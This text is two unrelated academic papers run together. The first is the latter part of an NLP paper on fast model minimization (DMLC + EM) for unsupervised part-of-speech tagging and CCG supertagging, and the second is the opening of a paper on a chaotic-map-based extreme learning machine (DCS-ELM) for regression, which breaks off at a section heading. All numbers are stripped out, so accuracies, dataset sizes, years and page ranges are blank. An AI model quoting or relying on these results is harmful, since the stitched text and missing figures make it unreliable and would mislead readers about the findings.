the dictionary was constructed from , tokens comprising , word types and , word/tag pairs, with a per-type ambiguity of . and a per-token ambiguity of . on the raw data. the raw data consisted of , tokens and the test contained , tokens. we use the unlabeled corpus from the raw and test data to perform model minimization followed by unsupervised em training.

other languages: in order to test the effectiveness of our method in other non-english settings, we also report the performance of our method on several other indo-european languages using treebank data from the conll-x and conll shared tasks on dependency parsing (buchholz and marsi, ; nivre et al., ). the corpus statistics for the five languages (danish, greek, italian, portuguese and spanish) are listed below. for each language, we construct a dictionary from the raw training data. the unlabeled corpus from the raw training and test data is used to perform model minimization followed by unsupervised em training. as before, unknown words are allowed to have all possible tags. we report the final tagging performance on the test data and compare it to baseline em.

garrette and baldridge ( ) treat unknown words (words that appear in the raw text but are missing from the dictionary) in a special manner and use several heuristics to perform better initialization for such words (for example, the probability that an unknown word is associated with a particular tag is conditioned on the openness of the tag). they also use an auto-supervision technique to smooth counts learnt from em onto new words encountered during testing. in contrast, we do not apply any such technique for unknown words and allow them to be mapped uniformly to all possible tags in the dictionary. for this particular set of experiments, the only difference from the garrette and baldridge ( ) setup is that we add unlabeled text from the test data (but without any dictionary tag labels or special heuristics) to our existing word tokens from raw text for performing model minimization. this is a standard practice used in unsupervised training scenarios (for example, bayesian inference methods) and in general for scalable techniques where the goal is to perform inference on the same data for which one wishes to produce some structured prediction.

language | train (tokens) | dict (entries) | test (tokens)
danish | | |
greek | | |
italian | | |
portuguese | | |
spanish | | |

results: table (column ) compares previously reported results against our approach for english. we observe that our method obtains a huge improvement over standard em and gets comparable results to the previous best reported scores for the same task from (garrette and baldridge, ). it is encouraging to note that the new system achieves this performance without using any of the carefully-chosen heuristics employed by the previous method. however, we do note that some of these techniques can be easily combined with our method to produce further improvements.

table (column ) also shows results on italian pos tagging. we observe that our method achieves significant improvements in tagging accuracy over all the baseline systems, including the previous best system (+ . %). this demonstrates that the method generalizes well to other languages and produces consistent tagging improvements over existing methods for the same task.

table : part-of-speech tagging accuracy using ptb sections - and tut to build the tag dictionary. for comparison, we also include the results for the previously reported state-of-the-art system (method ) for the same task.
method | english (ptb - ) | italian (tut)
random | . | .
em | . | .
type-supervision + hmm initialization (garrette and baldridge, ) | . | .
dmlc + em (this work) | . | .

results for pos tagging on conll data in five different languages are displayed in figure .

[figure : part-of-speech tagging accuracy for different languages (danish, greek, italian, portuguese, spanish) on conll data using incomplete dictionaries; bars compare em and dmlc + em.]

note that the proportion of raw data in test versus train (from the standard conll shared tasks) is much smaller compared to the earlier experimental settings. in general, we observe that adding more raw data for em training improves the tagging quality (the same trend observed earlier in table : column versus column ). despite this, dmlc + em still achieves significant improvements over the baseline em system on multiple languages (as shown in figure ). an additional advantage of the new method is that it can easily scale to larger corpora and produces a much more compact grammar that can be efficiently incorporated for em training.

. . tagging for low-resource languages

learning part-of-speech taggers for severely low-resource languages (e.g., malagasy) is very challenging. in addition to scarce (token-supervised) labeled resources, the tag dictionaries available for training taggers are tiny compared to other languages such as english. garrette and baldridge ( ) combine various supervised and semi-supervised learning algorithms into a common pos tagger training pipeline to address some of these challenges. they also report tagging accuracy improvements on low-resource languages when using the combined system over any single algorithm. their system has four main parts, in order: ( ) tag dictionary expansion using a label propagation algorithm, ( ) weighted model minimization, ( ) expectation maximization (em) training of hmms using auto-supervision, ( ) maxent markov model (memm) training (for more details, refer to garrette and baldridge, ). the entire procedure results in a trained tagger model that can then be applied to tag any raw data. step in this procedure involves a weighted version of model minimization which uses the multi-step greedy approach from ravi et al. ( b), enhanced with additional heuristics that use tag weights learnt via label propagation (in step ) within the minimization process. we replace the model minimization procedure in their step with our method (dmlc + em) and directly compare this new system with their approach in terms of tagging accuracy. note that for all other steps in the pipeline we follow the same procedure (and run the same code) as garrette and baldridge ( ), including the same smoothing procedure for em initialization in step .

table : part-of-speech tagging accuracy for a low-resource language (malagasy) on all/known/unknown tokens in the test data. tagging performance is shown for multiple experiments using different (incomplete) dictionary sizes: (a) small, (b) tiny (shown in parentheses). the new method (row ) significantly outperforms the existing method with p < . for the small dictionary and p < . for the tiny dictionary.
method | total | known | unknown
low-resource tagging using (garrette and baldridge, ) | . ( . ) | . ( . ) | . ( . )
low-resource tagging using dmlc + em (this work) | . ( . ) | . ( . ) | . ( . )
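the total/known/unknown breakdown reported above follows the usual convention of splitting test tokens by whether the word appears in the tag dictionary; a small illustrative sketch of that bookkeeping (the function and variable names are assumptions, not the authors' evaluation code) is:

```python
def tagging_accuracy(gold, predicted, dictionary):
    """gold/predicted: parallel lists of (word, tag) pairs for the test corpus;
    dictionary: dict mapping a word to its set of allowed tags. Returns accuracy
    (as percentages) over all tokens, over known tokens (word present in the
    dictionary), and over unknown tokens."""
    counts = {"total": [0, 0], "known": [0, 0], "unknown": [0, 0]}
    for (word, gold_tag), (_, pred_tag) in zip(gold, predicted):
        buckets = ["total", "known" if word in dictionary else "unknown"]
        for b in buckets:
            counts[b][0] += int(pred_tag == gold_tag)  # correct predictions
            counts[b][1] += 1                          # tokens seen
    return {b: 100.0 * correct / max(n, 1) for b, (correct, n) in counts.items()}
```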
data: we use the exact same setup as garrette and baldridge ( ) and run experiments on mala- gasy, an austronesian language spoken in madagas- car. we use the publicly available data : k raw tokens for training, a word-tag dictionary acquired with hours of human annotation effort (used for type-supervision), and a held-out test dataset ( tokens). we provide the unlabeled corpus from the raw training data along with the word-tag dictionary as input to model minimization and evaluate on the test corpus. we run multiple experiments for dif- ferent (incomplete) dictionary scenarios: (a) small = word/tag pairs, (b) tiny = word/tag pairs. results: table shows results on malagasy data comparing a system that employs (unweighted) github.com/ dhgarrette/low-resource-pos-tagging- dmlc against the existing state-of-the-art system that incorporates a multi-step weighted model min- imization combined with additional heuristics. we observe that switching to the new model minimiza- tion procedure alone yields significant improvement in tagging accuracy under both dictionary scenarios. it is encouraging that a better minimization proce- dure also leads to higher tagging quality on the un- known word tokens (column in the table), even when the input dictionary is tiny. . supertagging compared to pos tagging, a more challenging task is learning supertaggers for lexicalized grammar formalisms such as combinatory categorial gram- mar (ccg) (steedman, ). for example, ccg- bank (hockenmaier and steedman, ) contains distinct supertags (lexical categories) and the most ambiguous word has supertags. this pro- vides a much more challenging starting point for the semi-supervised methods typically applied to the task. yet, this is an important task since cre- ating grammars and resources for ccg parsers for new domains and languages is highly labor- and knowledge-intensive. as described earlier, our approach scales easily to large datasets as well as label sizes. to evaluate it on the supertagging task, we use the same dataset from (ravi et al., a) and compare against their base- line method that uses an modified (two-step) version method supertagging accuracy (%) ambiguous total . em . . . ilp∗ + em (ravi et al., a) . . . dmlc + em (this work) . . table : results for unsupervised supertagging with a dictionary. here, we report the total accuracy as well as accuracy on just the ambiguous tokens (i.e., tokens which have more than one tagging possibility). ∗the baseline method requires several pre-processing steps in order to run feasibly for this task (described in section . ). in contrast, the new approach (dmlc) runs fast and also permits efficient parallelization. of the ilp formulation for model minimization. data: we use the ccgbank data for this ex- periment. this data was created by semi- auto- matically converting the penn treebank to ccg derivations (hockenmaier and steedman, ). we use the standard splits of the data used in semi- supervised tagging experiments (banko and moore, )—sections - for training (i.e., to construct the word-tag dictionary), and sections - for test. results: table compares the results for two baseline systems—standard em (method ), and a previously reported system using model minimiza- tion (method ) for the same task. we observe that dmlc produces better taggings than either of these and yields significant improvement in accu- racy (+ % overall, + . % on ambiguous tokens). 
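for clarity, the small helper below shows how the two numbers reported in the table can be computed from a tagged test set: overall accuracy over all tokens, and accuracy restricted to ambiguous tokens, i.e., tokens with more than one tag in the dictionary. the function and argument names are illustrative placeholders, not code from the paper.

```python
def tagging_accuracy(tokens, gold, pred, tag_dict):
    """Overall accuracy and accuracy restricted to ambiguous tokens (>1 dictionary tag)."""
    assert len(tokens) == len(gold) == len(pred)
    total = sum(g == p for g, p in zip(gold, pred)) / len(gold)
    ambiguous_idx = [i for i, w in enumerate(tokens) if len(tag_dict.get(w, ())) > 1]
    ambiguous = (sum(gold[i] == pred[i] for i in ambiguous_idx) / len(ambiguous_idx)
                 if ambiguous_idx else float("nan"))
    return total, ambiguous
```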
note that it is not feasible to run the ilp-based baseline (method in the table) directly since it is very slow in practice, so ravi et al. ( a) use a set of pre-processing steps to prune the original grammar size (unique tag pairs) from > m to sev- eral thousand entries followed by a modified two- step ilp minimization strategy. this is required to permit their model minimization step to be run in a feasible manner. on the other hand, the new ap- proach dmlc (method ) scales better even when the data/label sizes are large, hence it can be run with the full data using the original model minimization formulation (rather than a two-step heuristic). ravi et al. ( a) also report further improve- ments using an alternative approach involving an ilp-based weighted minimization procedure. in section we briefly discuss how the dmlc method can be extended to this setting and combined with other similar methods. discussion and conclusion we present a fast, efficient model minimization algorithm for unsupervised tagging that improves upon previous two-step heuristics. we show that un- der a fairly natural assumption of c-feasibility the solution obtained by our minimization algorithm is o(c log m)-approximate to the optimal. although in the case of two-step heuristics, the first step guar- antees an o(log m)-approximation, the second step, which is required to get a consistent solution, can introduce many additional labels resulting in a so- lution arbitrarily away from the optimal. our one step approach ensures consistency at each step of the algorithm, while the c-feasibility assumption means that the solution does not diverge too much from the optimal in each iteration. in addition to proving approximation guarantees for the new algorithm, we show that it is paralleliz- able, allowing us to easily scale to larger datasets than previously explored. our results show that the algorithm achieves state-of-the-art performance, outperforming existing methods on several differ- ent tasks (both pos tagging and supertagging) and works well even with incomplete dictionaries and extremely low-resource languages like malagasy. for future work, it would be interesting to apply a weighted version of the dmlc algorithm where la- bels (i.e., tag pairs) can have different weight distri- butions instead of uniform weights. our algorithm can be extended to allow an input weight distribu- tion to be specified for minimization. in order to initialize the weights we could use existing strate- gies such as grammar-informed initialization (ravi et al., a) or output distributions learnt via other methods such as label propagation (garrette and baldridge, ). references . apache giraph. http://giraph.apache. org/. michele banko and robert c. moore. . part-of- speech tagging in context. in proceedings of coling, pages – . andrew r barron, jorma rissanen, and bin yu. . the minimum description length principle in cod- ing and modeling. ieee transactions of information theory, ( ): – . cristina bosco, vincenzo lombardo, daniela vassallo, and leonardo lesmo. . building a treebank for italian: a data-driven annotation schema. in proceed- ings of the second international conference on lan- guage resources and evaluation lrec- , pages – . sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proceed- ings of conll, pages – . christos christodoulopoulos, sharon goldwater, and mark steedman. . two decades of unsupervised pos induction: how far have we come? 
in proceed- ings of the conference on empirical methods in natu- ral language processing (emnlp), pages – . dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies - volume , pages – . a. p. dempster, n. m. laird, and d. b. rubin. . maximum likelihood from incomplete data via the em algorithm. journal of the royal statistical society, se- ries b, ( ): – . kuzman ganchev, joão graça, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. journal of machine learning research, : – . dan garrette and jason baldridge. . type- supervised hidden markov models for part-of-speech tagging with incomplete tag dictionaries. in proceed- ings of the conference on empirical methods in nat- ural language processing and computational natu- ral language learning (emnlp-conll), pages – . dan garrette and jason baldridge. . learning a part-of-speech tagger from two hours of annotation. in proceedings of the conference of the north american chapter of the association for computational linguis- tics: human language technologies, pages – . kevin gimpel, nathan schneider, brendan o’connor, dipanjan das, daniel mills, jacob eisenstein, michael heilman, dani yogatama, jeffrey flanigan, and noah a. smith. . part-of-speech tagging for twitter: annotation, features, and experiments. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies: short papers - volume , pages – . yoav goldberg, meni adler, and michael elhadad. . em can find pretty good hmm pos-taggers (when given a good start). in proceedings of acl, pages – . sharon goldwater and thomas l. griffiths. . a fully bayesian approach to unsupervised part-of- speech tagging. in acl. fernando c. gomes, cludio n. meneses, panos m. pardalos, and gerardo valdisio r. viana. . ex- perimental analysis of approximation algorithms for the vertex cover and set covering problems. kazi saidul hasan and vincent ng. . weakly super- vised part-of-speech tagging for morphologically-rich, resource-scarce languages. in proceedings of the th conference on the european chapter of the associa- tion for computational linguistics, pages – . julia hockenmaier and mark steedman. . ccg- bank: a corpus of ccg derivations and dependency structures extracted from the penn treebank. compu- tational linguistics, ( ): – . mark johnson. . why doesn’t em find good hmm pos-taggers? in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learning (emnlp-conll), pages – . philipp koehn. . europarl: a parallel corpus for statistical machine translation. in machine transla- tion summit x, pages – . grzegorz malewicz, matthew h. austern, aart j.c bik, james c. dehnert, ilan horn, naty leiser, and grze- gorz czajkowski. . pregel: a system for large- scale graph processing. in proceedings of the acm sigmod international conference on manage- ment of data, pages – . mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . bernard merialdo. . tagging english text with a probabilistic model. computational linguistics, ( ): – . taesun moon, katrin erk, and jason baldridge. . 
crouching dirichlet, hidden markov model: unsu- pervised pos tagging with context local tag genera- tion. in proceedings of the conference on empirical methods in natural language processing, pages – . joakim nivre, johan hall, sandra kübler, ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proceedings of the conll shared task session of emnlp-conll, pages – . sujith ravi and kevin knight. . minimized models for unsupervised part-of-speech tagging. in proceed- ings of the joint conferenceof the th annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing of the asian federation of natu- ral language processing (acl-ijcnlp), pages – . sujith ravi, jason baldridge, and kevin knight. a. minimized models and grammar-informed initializa- tion for supertagging with highly ambiguous lexicons. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl), pages – . sujith ravi, ashish vaswani, kevin knight, and david chiang. b. fast, greedy model minimization for unsupervised tagging. in proceedings of the rd in- ternational conference on computational linguistics (coling), pages – . roi reichart, raanan fattal, and ari rappoport. . improved unsupervised pos induction using intrinsic clustering quality and a zipfian constraint. in proceed- ings of the fourteenth conference on computational natural language learning, pages – . mark steedman. . the syntactic process. mit press, cambridge, ma, usa. kristina toutanova and mark johnson. . a bayesian lda-based model for semi-supervised part- of-speech tagging. in advances in neural information processing systems (nips), pages – . dcs-elm: a novel method for extreme learning machine for regression problems and a new approach for the sfrscc dcs-elm: a novel method for extreme learning machine for regression problems and a new approach for the sfrscc osman altay, mustafa ulas and kursat esat alyamac firat university, elazig, turkey abstract extreme learning machine (elm) algorithm is widely used in regression and classification problems due to its advantages such as speed and high-performance rate. different artificial intelligence-based optimization methods and chaotic systems have been proposed for the development of the elm. however, a generalized solution method and success rate at the desired level could not be obtained. in this study, a new method is proposed as a result of developing the elm algorithm used in regression problems with discrete-time chaotic systems. elm algorithm has been improved by testing five different chaotic maps (chebyshev, iterative, logistic, piecewise, tent) from chaotic systems. the proposed discrete-time chaotic systems based elm (dcs-elm) algorithm has been tested in steel fiber reinforced self- compacting concrete data sets and public four different datasets, and a result of its performance compared with the basic elm algorithm, linear regression, support vector regression, kernel elm algorithm and weighted elm algorithm. it has been observed that it gives a better performance than other algorithms. subjects artificial intelligence, data mining and machine learning, data science keywords extreme learning machine, discrete-time chaotic systems, chaotic maps, regression algorithm, sfrscc introduction feed-forward neural networks have been widely used since they were proposed (rumelhart, hinton & williams, ). 
traditional feed-forward neural networks generally use the first-order gradient method to optimize parameters. feed-forward neural networks suffer from problems such as low convergence and local minimums (huang et al., ). to deal with this problem, researchers have proposed different methods. these include feed-forward artificial neural network models developed with optimization methods such as artificial bee colony (karaboga, akay & ozturk, ), hybrid particle swarm optimization (al-kazemi & mohan, ), differential evolution (ilonen, kamarainen & lampinen, ) and genetic algorithm (montana & davis, ) during training. however, these methods still cannot provide the global optimal solution and need to be improved. lack of fast learning algorithms in artificial neural networks, training of artificial neural networks using traditional methods took hours and even days caused the need for a new method. as a result, the extreme learning machine (elm) algorithm has emerged and elm algorithm has been proposed by huang, zhu & siew ( ). elm is used to train how to cite this article altay o, ulas m, alyamac ke. . dcs-elm: a novel method for extreme learning machine for regression problems and a new approach for the sfrscc. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author osman altay, oaltay@firat.edu.tr academic editor ka-chun wong additional information and declarations can be found on page doi . /peerj-cs. copyright altay et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:oaltay@�firat.�edu.�tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ single-layer feed-forward neural networks (slfns). it has been shown in various articles that the elm algorithm provides a better global optimal solution when compared to traditional feed-forward neural networks. theoretical studies have shown that even with randomly generated hidden nodes, elm retains universal convergence ability over slfns. different versions of the elm algorithm developed with different optimization methods and chaotic systems have been proposed in order to give a better global optimum solution. in , zhu et al. ( ) proposed the evolutionary elm algorithm using the differential evolutionary algorithm method. an elm algorithm using the particle swarm optimization method was proposed by xu & shu ( ). in addition to these, an elm algorithm developed by using different evolutionary optimization algorithms has also been proposed (zhu et al., ; xu & shu, ; silva, pacifico & ludermir, ). in addition to artificial intelligence-based optimization algorithms, there is also an elm algorithm developed using chaotic systems (huang et al., ; yang, wang & yuan, ). chaotic systems have also been used to develop optimization methods used in the elm algorithm. examples of these are the chaotic salp swarm optimization method (mohanty et al., ) and the elm algorithm improved by the chaotic moth-flame optimization method (wang et al., ). in this study, assignment of weight values and bias values was based on a determination using chaotic maps, not randomly. in the basic elm algorithm, weight and bias values are assigned randomly. 
the random selection of bias and weight values seems to be the biggest obstacle to achieving the desired global optimum solution as a result of insufficient dispersion of the distributions. this causes repetition and generation of the same values when high values are needed due to the irregular operation of the random command (yang, wang & yuan, ; mohanty et al., ; wang et al., ). chaotic system classes can be listed as discrete time, continuous time, time delay and hyper-chaotic systems. each of these chaotic classes of systems has its own advantages and disadvantages. discrete-time chaotic systems are used to determine the weight and bias values. discrete-time chaotic systems have a significant advantage over other chaotic system models due to their high performance in computer applications with their simple mathematical models. it is aimed to find the best bias and weight parameters by using discrete-time chaotic systems. it was observed that the proposed algorithm in the study achieved better results when compared with the basic elm algorithm, linear regression (lr), support vector regression (svr), kernel elm (kelm) and weighted elm (welm). in particular, the proposed algorithm has found a better and generalized solution in data sets where the number of hidden neurons increases and long training period. a discrete-time chaotic systems-based extreme learning machine (dcs-elm) algorithm has been proposed using discrete-time chaotic systems to improve the performance of the extreme learning machine algorithm. in the proposed algorithm, chebyshev, iterative, logistic, piecewise and tent map discrete-time chaotic systems are used. the proposed dcs-elm algorithm has been tested in different data sets and it has been found to give better results in most of them. altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ extreme learning machine feed-forward neural networks are widely used in many different areas due to their capabilities. the first is to predict nonlinear mapping methods using direct input samples. the second is; it can offer models for natural and artificial classes. lack of fast learning algorithms in artificial neural networks, training of artificial neural networks using traditional methods took hours and even days caused the need for a new method. as a result, the elm algorithm has emerged (huang, zhu & siew, ). traditionally, all parameters of feed forward networks have to be set (gurgenc et al., ). for this reason, there is a dependency relationship between bias and weight values between different layers. gradient descent based methods are mainly used in various learning algorithms of feed forward neural networks. gradient descent based methods are sometimes very slow or can easily approach the local minimum. too many iterations may be required to achieve better learning. feed forward networks can be thought of as a linear model after the input weights and hidden layer trends are randomly selected. output weights of feedforward networks can be determined analytically by simple generalized inverse study of hidden layer output matrices. the exit logic of elm is also based on this situation and it has been shown in different data sets that it is a much faster and generalized model compared to traditional artificial neural networks (huang, zhu & siew, ). gradient-based solution the gradient-based solution has traditionally been used to train single-hidden layer feed forward neural networks. 
specifically, it is used to find the values of $\hat{w}_i$, $\hat{b}_i$ and $\hat{\beta}$, $i = 1, \ldots, \tilde{N}$ (huang, zhu & siew, ), such that

$\| H(\hat{w}_1, \ldots, \hat{w}_{\tilde{N}}, \hat{b}_1, \ldots, \hat{b}_{\tilde{N}})\,\hat{\beta} - T \| = \min_{w_i, b_i, \beta} \| H(w_1, \ldots, w_{\tilde{N}}, b_1, \ldots, b_{\tilde{N}})\,\beta - T \|$

this corresponds to minimizing the cost function

$E = \sum_{j=1}^{N} \left( \sum_{i=1}^{\tilde{N}} \beta_i \, g(w_i \cdot x_j + b_i) - t_j \right)^2$

when $H$ is unknown, gradient-based learning algorithms are generally used to search for the minimum of $\| H\beta - T \|$. in the gradient-based minimization process, the vector $w$, which collects the weights $(w_i, \beta_i)$ and bias values $b_i$, is iteratively adjusted as (huang, zhu & siew, )

$w_k = w_{k-1} - \eta \, \frac{\partial E(w)}{\partial w}$

where $\eta$ is the learning rate. the learning algorithm popularly used in feed-forward neural networks is back propagation, in which gradients are computed efficiently by propagating errors from the output layer back to the input layer. there are several problems with the back propagation learning algorithm (huang, zhu & siew, ; ulas et al., ):
- when the learning rate $\eta$ is small, the algorithm converges very slowly; when $\eta$ is large, it becomes unstable and diverges.
- the presence of local minima also affects back propagation: it is undesirable for the learning algorithm to stop at a local minimum instead of the global minimum.
- a network trained with back propagation may be over-trained and show poor generalization performance, so valid and appropriate stopping criteria are required while reducing the cost function.
- gradient-based learning takes a lot of time in most applications.

the elm algorithm was proposed to solve these problems of gradient-based training, eliminating them and giving a more efficient learning algorithm for feed-forward neural networks (huang, zhu & siew, ).

least squares norm
unlike traditional function approximation theories that require adjusting the input weights and hidden layer biases, these values can be assigned randomly, provided the activation function is infinitely differentiable. contrary to the common understanding that all parameters of a feed-forward neural network need to be tuned, the input weights and bias values in the hidden layer do not need to be adjusted, and the hidden layer output matrix $H$ can remain unchanged. training then reduces to solving the linear system $H\beta = T$ for the least squares solution $\hat{\beta}$:

$\| H(w_1, \ldots, w_{\tilde{N}}, b_1, \ldots, b_{\tilde{N}})\,\hat{\beta} - T \| = \min_{\beta} \| H(w_1, \ldots, w_{\tilde{N}}, b_1, \ldots, b_{\tilde{N}})\,\beta - T \|$

if the number of hidden nodes $\tilde{N}$ is equal to the number of samples $N$, the matrix $H$ is square and invertible, and the input weight vectors $w_i$ and hidden bias values $b_i$ can be chosen randomly. however, in most real problems the number of hidden nodes is much smaller than the number of distinct training instances, so $H$ is non-square and there may be no $\beta$ that satisfies $H\beta = T$ exactly. the smallest-norm least squares solution of the linear system is

$\hat{\beta} = H^{\dagger} T$

where $H^{\dagger}$ is the moore–penrose generalized inverse of $H$. in short, given a training set $\aleph = \{(x_i, t_i) \mid x_i \in \mathbb{R}^n,\ t_i \in \mathbb{R}^m,\ i = 1, \ldots, N\}$, an activation function $g(x)$ and $\tilde{N}$ hidden nodes, elm proceeds as follows:
step 1: assign randomly the weights $w_i$ and bias values $b_i$, $i = 1, \ldots, \tilde{N}$.
step 2: compute the hidden layer output matrix $H$.
step 3: calculate the output weight $\beta = H^{\dagger} T$, with $T = [t_1, \ldots, t_N]^{T}$, where the inverse of the $H$ matrix is taken using the moore–penrose generalized inverse $H^{\dagger}$.
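as a minimal illustration of these three steps, the sketch below implements single-output elm regression in numpy under a few assumptions that are ours rather than the paper's: input weights and biases drawn uniformly from [-1, 1], a sigmoid activation, and numpy's pinv for the moore–penrose generalized inverse.

```python
import numpy as np

def elm_fit(X, T, n_hidden, rng=None):
    """Minimal ELM sketch: random hidden layer, analytic output weights."""
    rng = np.random.default_rng(0) if rng is None else rng
    n_features = X.shape[1]
    W = rng.uniform(-1.0, 1.0, size=(n_features, n_hidden))   # step 1: random input weights
    b = rng.uniform(-1.0, 1.0, size=n_hidden)                  # step 1: random bias values
    H = 1.0 / (1.0 + np.exp(-(X @ W + b)))                     # step 2: hidden-layer output matrix (sigmoid)
    beta = np.linalg.pinv(H) @ T                               # step 3: Moore-Penrose solution of H beta = T
    return W, b, beta

def elm_predict(X, W, b, beta):
    H = 1.0 / (1.0 + np.exp(-(X @ W + b)))
    return H @ beta

# toy usage: fit a noisy one-dimensional regression target
X = np.linspace(0.0, 1.0, 200).reshape(-1, 1)
T = np.sin(2.0 * np.pi * X).ravel() + 0.05 * np.random.default_rng(1).normal(size=200)
W, b, beta = elm_fit(X, T, n_hidden=30)
predictions = elm_predict(X, W, b, beta)
```

the only trained quantity is beta; the hidden layer is never adjusted, which is what makes the procedure analytic rather than iterative.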
in summary, the elm algorithm generates the weight and bias values randomly and leaves them fixed. traditional feed-forward neural networks train the network recursively, whereas in the elm algorithm the output weights are obtained analytically (bilhan et al., ). in the elm algorithm, the moore–penrose generalized inverse is used to eliminate the disadvantages of recursive learning algorithms (altay & ulas, ). in this way, a nonlinear training problem is transformed into a linear system (huang, zhu & siew, ; huang et al., ). the basic representation of the elm algorithm is given in fig. .

figure: basic representation of elm.

activation function
different activation functions are used in elm, as in artificial neural networks. there is no prior indication of which activation function should be used for a given problem; the activation function is determined entirely by trial and error. hard limit, sine and sigmoid activation functions were used in the dcs-elm algorithm proposed in this study. the hard limit activation function is defined as (huang et al., )

$g(a, b, x) = \begin{cases} 1, & \text{if } a \cdot x - b \geq 0 \\ 0, & \text{otherwise} \end{cases}$

chaos theorem
chaos has been present in every event since the existence of the world. chaos basically has a certain stable and unique structure. chaotic systems remain stable as long as they can withstand the disturbing effects coming from outside their own disorder (baykal & beyan, ). there are differences between chaotic systems and random systems. although chaos and randomness are perceived as the same by many, there is a very basic and distinctive difference between them: chaotic systems have an order within disorder. after the concept of chaos emerged, researchers in this field regarded order as arising spontaneously in chaotic systems and observed that irregular behavior can be a creative process (baykal & beyan, ). in the shortest definition, chaotic systems are systems with unpredictable and seemingly random behavior. the most basic feature of chaos is its dependence on initial conditions: even when the initial conditions are very close to each other, the resulting orbits bear no relation to one another and diverge. the difference between such close initial values can be as small as a measurement error, yet it grows exponentially and the state of the system becomes indeterminable after a short time. chaotic systems are deterministic, contrary to popular belief, and should not be confused with stochastic systems; in a system, chaos is not a random external effect but the internal dynamics of the system itself (baykal & beyan, ; ozer, ). in order for a system's behavior to be called chaotic, it must comply with the following conditions.
- it must be sensitive to the initial conditions, that is, excessively dependent on them,
- it must contain a nonlinear element,
- discrete-time systems must be described by at least a first-order equation, and continuous-time systems by at least a third-order differential equation.

chaos theory has a much broader structure than that summarized here, and there are many derivatives of chaotic systems. these chaotic system classes can be listed as discrete-time, continuous-time, time-delay and hyper-chaotic systems, and each class has its own advantages and disadvantages. discrete-time chaotic systems have a significant advantage over the other chaotic system models because their simple mathematical models give high performance in computer applications. because of these advantages, we focused on discrete-time chaotic systems. the chaotic maps and their equations used in this study are listed in the table below, and fig. includes sample distribution charts of the chaotic maps.

table: equations and parameters of chaotic maps.
- chebyshev map: $x_{n+1} = \cos(k \cos^{-1} x_n)$
- iterative map: $x_{n+1} = \sin(a\pi / x_n)$, parameter $a$
- logistic map: $x_{n+1} = a x_n (1 - x_n)$, parameter $a$
- piecewise map: $x_{n+1} = x_n/p$ for $0 \le x_n < p$; $(x_n - p)/(0.5 - p)$ for $p \le x_n < 0.5$; $(1 - p - x_n)/(0.5 - p)$ for $0.5 \le x_n < 1 - p$; $(1 - x_n)/p$ for $1 - p \le x_n < 1$, parameter $p$
- tent map: $x_{n+1} = x_n/\mu$ for $x_n < \mu$; $\nu\, x_n (1 - x_n)$ otherwise

proposed dcs-elm
recently, chaotic number sequences have been used in place of random number sequences in secure communication (caponetto et al., ), in improving the performance of optimization methods (alatas, ; altay & alatas, ), in artificial neural networks (nozawa, ) and in nonlinear circuits (arena et al., ), and more successful results have been obtained in some applications. the parts to be determined by the user in the basic elm algorithm are the activation function and the number of hidden neurons; the elm algorithm then generates the input weights and bias values randomly. as a result of this random generation, the distribution of the values is not good and the desired performance cannot always be obtained from the elm algorithm. the basic elm algorithm is shown in the table below. in the proposed algorithm, the input weights and bias values are created by using chaotic maps instead of randomly; in this way, it is aimed to eliminate the disadvantages caused by random generation. the flow of the proposed dcs-elm is given in the second table below. the performance of the proposed algorithm compared with elm and basic machine learning algorithms is shown in the next sections.

table: basic elm algorithm.
given a training set $\aleph = \{(x_i, t_i) \mid x_i \in \mathbb{R}^n,\ t_i \in \mathbb{R}^m,\ i = 1, \ldots, N\}$, an activation function $g(x)$ and $\tilde{N}$ hidden nodes:
step 1: assign randomly the weights $w_i$ and bias values $b_i$, $i = 1, \ldots, \tilde{N}$.
step 2: compute the hidden layer output matrix $H$.
step 3: calculate the output weight $\beta = H^{\dagger} T$, $T = [t_1, \ldots, t_N]^{T}$, where the inverse of the $H$ matrix is taken using the moore–penrose generalized inverse $H^{\dagger}$.

table: dcs-elm algorithm.
given a training set $\aleph = \{(x_i, t_i) \mid x_i \in \mathbb{R}^n,\ t_i \in \mathbb{R}^m,\ i = 1, \ldots, N\}$, an activation function $g(x)$ and $\tilde{N}$ hidden nodes:
step 1: assign using chaotic maps the weights $w_i$ and bias values $b_i$, $i = 1, \ldots, \tilde{N}$.
step 2: compute the hidden layer output matrix $H$.
step 3: calculate the output weight $\beta = H^{\dagger} T$, $T = [t_1, \ldots, t_N]^{T}$, where the inverse of the $H$ matrix is taken using the moore–penrose generalized inverse $H^{\dagger}$.
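to make this replacement concrete, the sketch below fills the hidden-layer weights and biases from a logistic-map sequence instead of a random number generator; the choice of map, the initial value x0 and the rescaling to [-1, 1] are assumptions made for the example and need not match the exact settings of the proposed dcs-elm.

```python
import numpy as np

def logistic_sequence(n, x0=0.37, a=4.0):
    """Generate n values from the logistic map x_{k+1} = a * x_k * (1 - x_k), all in (0, 1)."""
    seq = np.empty(n)
    x = x0
    for k in range(n):
        x = a * x * (1.0 - x)
        seq[k] = x
    return seq

def chaotic_hidden_layer(n_features, n_hidden, x0=0.37):
    """Fill input weights and biases from one chaotic sequence, rescaled to [-1, 1]."""
    vals = 2.0 * logistic_sequence(n_features * n_hidden + n_hidden, x0) - 1.0
    W = vals[: n_features * n_hidden].reshape(n_features, n_hidden)
    b = vals[n_features * n_hidden :]
    return W, b

# the rest of training is unchanged: H is built from (W, b) and beta = pinv(H) @ T,
# exactly as in the basic elm steps above
```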
10-k cross validation
